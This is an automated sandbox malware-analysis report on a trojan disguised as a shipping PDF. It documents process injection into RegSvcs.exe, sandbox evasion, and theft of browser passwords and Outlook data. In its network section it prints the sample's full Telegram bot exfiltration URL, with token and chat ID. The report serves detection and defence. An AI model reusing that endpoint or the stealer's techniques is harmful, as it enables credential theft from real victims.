          Source: Shipment Document BL,INV and packing list.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdb source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.355434952.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.356665790.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp
          Source: Shipment Document BL,INV and packing list.pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Shipment Document BL,INV and packing list.pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Shipment Document BL,INV and packing list.pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Shipment Document BL,INV and packing list.pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Shipment Document BL,INV and packing list.pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeFile created: \shipment document bl,inv and packing list.pdf.exe
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeFile created: \shipment document bl,inv and packing list.pdf.exeJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: Possible double extension: pdf.exeStatic PE information: Shipment Document BL,INV and packing list.pdf.exe
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeAPI/Special instruction interceptor: Address: A6DF34
          Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.352976428.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.353487685.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.352997642.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.358453034.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.353512252.0000000000AB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE^(
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 9563Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe"Jump to behavior
          Source: Shipment Document BL,INV and packing list.pdf.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.352976428.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.353487685.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.352997642.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.358453034.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.353512252.0000000000AB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR
          Source: Yara matchFile source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR
          Source: Yara matchFile source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
          Source: Yara matchFile source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR
          Source: Yara matchFile source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR
          Source: Yara matchFile source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          DLL Side-Loading
          212
          Process Injection
          1
          Masquerading
          1
          OS Credential Dumping
          21
          Security Software Discovery
          Remote Services1
          Email Collection
          1
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Disable or Modify Tools
          LSASS Memory1
          Process Discovery
          Remote Desktop Protocol1
          Data from Local System
          1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
          Virtualization/Sandbox Evasion
          Security Account Manager11
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive1
          Ingress Tool Transfer
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook212
          Process Injection
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information
          LSA Secrets1
          Remote System Discovery
          SSHKeylogging14
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials1
          System Network Configuration Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync113
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Shipment Document BL,INV and packing list.pdf.exe50%ReversingLabsWin32.Trojan.AutoitInject
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://api.telegram.orgX0%Avira URL Cloudsafe

          Download Network PCAP: filteredfull

          NameIPActiveMaliciousAntivirus DetectionReputation
          reallyfreegeoip.org
          104.21.112.1
          truefalse
            high
            api.telegram.org
            149.154.167.220
            truefalse
              high
              checkip.dyndns.com
              132.226.8.169
              truefalse
                high
                checkip.dyndns.org
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://reallyfreegeoip.org/xml/8.46.123.189false
                    high
                    https://api.telegram.org/bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632407857&caption=user%20/%20Passwords%20/%208.46.123.189false
                      high
                      http://checkip.dyndns.org/false
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://reallyfreegeoip.orgXRegSvcs.exe, 00000002.00000002.879714743.00000000020BF000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://api.telegram.orgRegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://crl.entrust.net/server1.crl0RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://api.telegram.org/botRegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://api.telegram.orgXRegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://ocsp.entrust.net03RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://reallyfreegeoip.org/xml/8.46.123.189XRegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.diginotar.nl/cps/pkioverheid0RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://checkip.dyndns.orgRegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.0000000002096000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://checkip.dyndns.org/qShipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                high
                                                http://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.879714743.00000000020BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.org/XRegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.comRegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://api.telegram.orgRegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://ocsp.entrust.net0DRegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.879714743.0000000002021000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://secure.comodo.com/CPS0RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://checkip.dyndns.comXRegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://checkip.dyndns.orgXRegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://crl.entrust.net/2048ca.crl0RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://api.telegram.org/bot-/sendDocument?chat_id=Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://reallyfreegeoip.org/xml/Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          149.154.167.220
                                                                          api.telegram.orgUnited Kingdom
                                                                          62041TELEGRAMRUfalse
                                                                          104.21.112.1
                                                                          reallyfreegeoip.orgUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          132.226.247.73
                                                                          unknownUnited States
                                                                          16989UTMEMUSfalse
                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1640472
                                                                          Start date and time:2025-03-17 11:08:42 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 6m 19s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                          Number of analysed new started processes analysed:4
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:Shipment Document BL,INV and packing list.pdf.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@3/2@5/3
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                          TimeTypeDescription
                                                                          06:09:36API Interceptor10208788x Sleep call for process: RegSvcs.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          149.154.167.220sryxen-built.exeGet hashmaliciousUnknownBrowse
                                                                            HSBC01703025_PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              QUOTATION#0033546.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                Teklif Talebi #U0130hale No-14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  BOM N012-001 231109.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        shipment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          SpotifyStartupTask.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
